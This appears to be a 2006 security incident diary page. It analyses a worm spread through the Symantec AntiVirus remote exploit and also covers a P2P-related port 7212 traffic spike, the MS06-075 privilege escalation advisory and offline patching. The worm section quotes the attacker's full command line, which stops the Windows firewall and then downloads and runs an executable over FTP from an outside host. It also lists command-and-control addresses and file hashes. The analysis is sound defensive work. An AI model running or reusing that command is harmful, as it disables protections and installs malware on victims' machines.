sav worm and its cc
This file was being downloaded by a large number of machines that were recently exploited using the SAV remote exploit. The sequence of events for these compromises were:
Exploit comes in from IP address A (this IP varies)
Victim sends a Windows command prompt to 61.172.250.59 on tcp port 12345 61.172.250.59 responds with the following:
cmd.exe /c "Net Stop SharedAccess&cd %TEMP%&echo open ftpd.3322.org 21211>x&echo test>>x&echo test>>x&echo bin>>x&echo get NL.eXe>>x&echo bye>>x&ftp.eXe -s:x&NL.eXe&del x"
Obviously, this command stops the Windows firewall service,
creates an ftp command script named "x" that is then run by ftp.exe -s:x
which downloads NL.eXe (from ftpd.3322.org 21211),
the file is then executed and then the x file is deleted.
Running the file through Virustotal gave limited information.
Complete scanning result of "NL.eXe", received in VirusTotal at 12.14.2006, 18:15:47 (CET).
BitDefender 7.2 12.14.2006 DeepScan:Generic.Malware.IBdld!g.C9552284
CAT-QuickHeal 8.00 12.14.2006 (Suspicious) - DNAScan
eSafe 7.0.14.0 12.14.2006 Win32.Polipos.sus
Fortinet 2.82.0.0 12.14.2006 suspicious
Ikarus T3.1.0.26 12.14.2006 Trojan-Downloader.Win32.Zlob.and
Kaspersky 4.0.2.24 12.14.2006 no virus found
Norman 5.80.02 12.14.2006 W32/Suspicious_U.gen
Panda 9.0.0.4 12.13.2006 Suspicious file
Prevx1 V2 12.14.2006 Malicious
Sophos 4.12.0 12.14.2006 Mal/Behav-009
Sunbelt 2.2.907.0 11.30.2006 VIPRE.Suspicious
All others reported no virus found!
Aditional Information
File size: 12168 bytes
MD5: f538d2c73c7bc7ad084deb8429bd41ef
SHA1: 0eb52548a1c234cb2f8506a7c9a2e1a4547e9f8d
packers: UPACK
packers: embedded, UPack
Prevx info: http://fileinfo.prevx.com/fileinfo.asp?PXC=70e962776070
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.
John, then reviewed his ids logs looking for traffic on the port 5202 which appears to be the command and control port for this malware and discovered traffic towards 61.172.146.94.
We have requested the cc system and the malware distribution site be shutdown.
I submitted nl.exe to norman and here are the results:
nl.exe.virus : Not detected by Sandbox (Signature: W32/Suspicious_U.gen)
[ General information ]
* File length: 12168 bytes.
* MD5 hash: f538d2c73c7bc7ad084deb8429bd41ef.
[ Changes to filesystem ]
* Creates file C:\WINDOWS\SYSTEM32\wuauclt.dll.
* Creates file C:\WINDOWS\TEMP\NL055.bat.
[ Process/window information ]
* Enumerates running processes.
* Attemps to NULL C:\WINDOWS\TEMP\NL055.bat NULL.
[ Signature Scanning ]
* C:\WINDOWS\SYSTEM32\wuauclt.dll (23040 bytes) : no signature detection.
* C:\WINDOWS\TEMP\NL055.bat (102 bytes) : no signature detection.
(C) 2004-2006 Norman ASA. All Rights Reserved
We had one report that this virus included a keylogger that has yet to be verified.
Port 7212 spike
I checked our port statistics and found we had had two spikes one on the 14th of November and
one on the 8th of December.
Nov 14th we saw 62k targets and 143k records with only 105 sources.
That is a 7x increase in records, a 15x increase in targets and the sources went down from the previous day.
On Dec 8th we saw 76k records against 27k targets with only 88 sources.
That is a 3x increase in records, 10x increase in targets and the sources went down from the previous day.
From the user comments on the SANS port statistics:
http://isc.sans.org/port_details.php?port=7212
"There are certain older versions of GhostSurf which fire up by default as a wide-open proxy,"
Lawrence Baldwin
Write-up on ghostsurf open proxy from November 23, 2005
http://www.tenebril.com/src/advisories/open-proxy-relay.php
But based on packets provided by Daniel F. it appears to be p2p related.
Here a write-up by Daniel and packet contents.
"Earlier today a significant increase of port 7212/TCP (unknown) scanning
against relatively large segments from networks in North America,
Sweden, and France was noted.
All probes analyzed thus far appear to be associated with a Peer-to-Peer
(P2P) application framework known as
"GnucDNA" (http://www.gnucleus.com/GnucDNA/).
-----------------------------
And two sanitized payloads:
GET /uri-res/N2R?urn:sha1:BJZCBU6KXKEWBY4MXFONNO3T6MYVF67H HTTP/1.1
Host: [targeted darknet address removed]:7212
User-Agent: Fildelarprogram 9.9.9.9 (GnucDNA 1.1.1.5)
Listen-IP: [.se host address removed]:17799
Connection: Keep-Alive
Range: bytes=0-524287
X-Queue: 0.1
X-Features: g2/1.0
Content-URN: urn:sha1:BJZCBU6KXKEWBY4MXFONNO3T6MYVF67H
GET /uri-res/N2R?urn:sha1:KONNXKWMSMHIJ7N63HLSPOHG7IPYVV25 HTTP/1.1
Host: [targeted darknet address removed]:7212
User-Agent: morph500 5.1.2.912 (GnucDNA 1.1.1.4)
Listen-IP: [.fr host address removed]:29168
Connection: Keep-Alive
Range: bytes=0-524287
X-Queue: 0.1
X-Features: g2/1.0
Content-URN: urn:sha1:KONNXKWMSMHIJ7N63HLSPOHG7IPYVV25"
So I did a google for GET /uri-res/N2R?urn:sha1 guess what its all bearshare, limewire and other p2p clients.
So this spike appears to be p2p related not open proxies. But the question on my mind is why so few sources but so many targets?
After a review of the top source IPs it appears most of this is coming from within china.
MS06-075: csrss local privilege escalation (CVE-2006-5585)
We rate this one as important. If someone can get access to the system via other means (cracked password, etc.) this vulnerability allows that person to elevate their privileges to become administrator by running a specially crafted executable.
References:
KB926255
CVE-2006-5585
Offline Microsoft Patching
Heise brings us "Offline Update 3.0" to do offline installations of Microsoft patches.
Read more about it at: http://www.heise-security.co.uk/articles/80682
Now this is a great concept. You can actually make a DVD to install the patches before you connect a PC (that's out of date on patches) to the Internet. If you think you can safely do that without this tool, take a second and think it through knowing that some of your friends needing a house call might have a USB connected DSL or cable modem and therefore not be using NAT, next take a look at the survival time and think how long it takes to get a windows system from original media to a fully patched status.
So, if you're going to visit parents, family or friends over the holidays, start your preparation now and make that disk today to take along. It'll improve the obligatory "Could you take a look at our computer while you're here?" response time dramatically and gives you a safe way to reinstall systems without a hardware based firewall.
If you have networks that you do not want to connect to the Internet cause the risks involved of doing that are just too big for the sensitivity of the involved data this might also become a way to patch those off-line machines.
Update: Simon wrote in mentioning AutoPatcher as an alternative solution.
Update: "Mads" reminded us Microsoft makes available ISO images with some of the patches on a monthly basis.
--
Swa Frantzen -- Section 66
/dev/random
Some major data breaches announced at UCLA and Boeing put the total number of privacy breaches at privacyrights.org since April 2005 to almost 100 million. http://www.privacyrights.org/ar/ChronDataBreaches.htm
New vulnerabilities announced in Symantec NetBackup: http://www.symantec.com/avcenter/security/Content/2006.12.13a.html
Comments